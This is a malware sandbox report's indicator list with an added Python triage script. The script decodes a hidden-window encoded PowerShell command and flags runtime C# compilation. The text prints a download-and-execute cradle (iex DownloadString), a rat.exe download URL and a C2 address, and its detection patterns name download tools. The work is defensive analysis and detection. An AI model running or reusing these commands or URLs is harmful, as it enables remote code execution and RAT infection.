Technical Information
- http://14#.##.80.151:2220/login
- <SYSTEM32>\rundll32.exe
- %TEMP%\gx4rl6vw.0.cs
- %TEMP%\gx4rl6vw.cmdline
- %TEMP%\gx4rl6vw.out
- %TEMP%\csc956b.tmp
- %TEMP%\res957c.tmp
- %TEMP%\gx4rl6vw.dll
- %TEMP%\res957c.tmp
- %TEMP%\csc956b.tmp
- %TEMP%\gx4rl6vw.cmdline
- %TEMP%\gx4rl6vw.pdb
- %TEMP%\gx4rl6vw.0.cs
- %TEMP%\gx4rl6vw.dll
- %TEMP%\gx4rl6vw.out
- '14#.#8.80.151':2220
- http://14#.##.80.151:2220/login via 14#.#8.80.151
- http://0x###25097:2220/r
- http://14#.##.80.151:2220/bin/rat.exe via 14#.#8.80.151
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\gx4rl6vw.cmdline" (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES957C.tmp" "%TEMP%\CSC956B.tmp" (with hidden window)
- '<SYSTEM32>\rundll32.exe'
- '<SYSTEM32>\cmd.exe' /c powershell -w 1 -e aQBlAHgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADQAMQA...
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\gx4rl6vw.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES957C.tmp" "%TEMP%\CSC956B.tmp"
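The process list above shows two things worth pulling apart: a hidden-window PowerShell launched with an encoded command (-w 1 -e <base64>, where the argument is base64 over UTF-16LE text), and a runtime C# compile chain (csc.exe /noconfig /fullpaths @"%TEMP%\<8 chars>.cmdline" followed by cvtres.exe writing RES<hex>.tmp), which is the file set the .NET CodeDOM compiler leaves behind when code is compiled on the fly, for example via PowerShell Add-Type. The Python below is an added triage example, not part of the original report: it decodes the encoded blob exactly as the sandbox cut it off (unpadded and ending mid URL), labels the download cradle it contains, and flags the csc.exe/cvtres.exe pattern in process-creation events. The events, their parent/child links, expanded paths, the benign MSBuild control case and the rule names are constructed assumptions; the report itself gives only image paths and command lines.

```python
"""Triage of the process list in the report: decode the hidden-window encoded
PowerShell command and flag the runtime C# compile chain (csc.exe and
cvtres.exe working from %TEMP%\\<8 chars>.cmdline).

Added example, not code from the original report.  Parent/child links and the
expanded paths in EVENTS are constructed to mirror the report; the sandbox
output itself only gives image paths and command lines.
"""
import base64
import re

# Copied from the report's truncated command line.  The sandbox cut the blob
# off, so it is not a multiple of 4 characters and the URL it carries is
# incomplete; the decoder below copes with that.
ENCODED_FROM_REPORT = (
    "aQBlAHgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4A"
    "VwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIA"
    "aAB0AHQAcAA6AC8ALwAxADQAMQA"
)

# powershell.exe accepts any unambiguous prefix of a switch: -e/-ec/-enc all
# mean -EncodedCommand, and -w 1 means -WindowStyle Hidden.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)")
HIDDEN_ARG = re.compile(r"(?i)(?:^|\s)-w[a-z]*\s+(?:1|hidden)\b")
EXEC_SINK = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")
NET_FETCH = re.compile(r"(?i)downloadstring|downloaddata|downloadfile|"
                       r"invoke-webrequest|invoke-restmethod|\b(?:iwr|irm|curl|wget)\b")
URL_PREFIX = re.compile(r"""(?i)https?://[^\s"')]+""")
# CodeDOM writes %TEMP%\<8 random chars>.cmdline and compiles it with csc.exe;
# csc then hands embedded resources to cvtres.exe as %TEMP%\RES<hex>.tmp.
TEMP_CMDLINE = re.compile(r'(?i)@"?[^"\s]*\\temp\\[a-z0-9_-]{8}\.cmdline')
CVTRES_TEMP = re.compile(r'(?i)/OUT:[^"]*\\temp\\RES[0-9A-F]+\.tmp')


def encode_command(text: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    """Decode -EncodedCommand: base64 over UTF-16LE, tolerant of truncation."""
    blob = blob.strip().rstrip("=")
    if len(blob) % 4 == 1:          # a lone sextet can never complete a byte
        blob = blob[:-1]
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    if len(raw) % 2:                # cut in the middle of a UTF-16 code unit
        raw = raw[:-1]
    return raw.decode("utf-16-le", errors="replace")


def triage(events):
    """Return (rule, detail) findings for a list of process-creation events."""
    findings = []
    for ev in events:
        image = ev["image"].lower().rsplit("\\", 1)[-1]
        cmd = ev["cmdline"]
        if image in ("powershell.exe", "pwsh.exe") or "powershell" in cmd.lower():
            m = ENCODED_ARG.search(cmd)
            if m:
                decoded = decode_encoded_command(m.group(1))
                url = URL_PREFIX.search(decoded)
                findings.append(("powershell_encoded_command", {
                    "hidden_window": bool(HIDDEN_ARG.search(cmd)),
                    "download_cradle": bool(EXEC_SINK.search(decoded)
                                            and NET_FETCH.search(decoded)),
                    "url": url.group(0) if url else None,
                    "decoded": decoded,
                }))
        elif image == "csc.exe":
            m = TEMP_CMDLINE.search(cmd)
            if m:
                findings.append(("runtime_csharp_compile",
                                 {"parent": ev["parent"], "response_file": m.group(0)}))
        elif image == "cvtres.exe" and CVTRES_TEMP.search(cmd):
            findings.append(("runtime_csharp_compile_resources",
                             {"parent": ev["parent"]}))
    return findings


# Constructed events modelled on the report (parents and expanded paths are
# assumptions).  The last one is a benign control: an MSBuild-driven compile
# reads a .rsp under the project tree, not a %TEMP%\*.cmdline file.
TEMP = r"C:\Users\user\AppData\Local\Temp"
NET2 = r"C:\Windows\Microsoft.NET\Framework64\v2.0.50727"
EVENTS = [
    {"parent": r"C:\Windows\System32\rundll32.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -w 1 -e " + ENCODED_FROM_REPORT},
    {"parent": r"C:\Windows\System32\rundll32.exe", "image": NET2 + r"\csc.exe",
     "cmdline": f'csc.exe /noconfig /fullpaths @"{TEMP}\\gx4rl6vw.cmdline"'},
    {"parent": NET2 + r"\csc.exe", "image": NET2 + r"\cvtres.exe",
     "cmdline": f'cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '
                f'"/OUT:{TEMP}\\RES957C.tmp" "{TEMP}\\CSC956B.tmp"'},
    {"parent": r"C:\Program Files\MSBuild\14.0\Bin\MSBuild.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r'csc.exe /noconfig @"C:\src\app\obj\Debug\app.csproj.rsp"'},
]

if __name__ == "__main__":
    for rule, detail in triage(EVENTS):
        print(rule, detail)
```

Running it decodes the report's blob to an iex(...DownloadString("http://...)) cradle whose URL is cut short where the sandbox truncated the command line, and flags the csc.exe and cvtres.exe events but not the MSBuild control. The csc.exe rule is a hunting lead rather than a verdict on its own: legitimate administrative scripts that use Add-Type produce the same %TEMP% .cmdline/.0.cs/.dll/.pdb set, so tune on the parent process (powershell.exe under an interactive or scheduled admin session versus rundll32.exe or an unknown binary) before alerting.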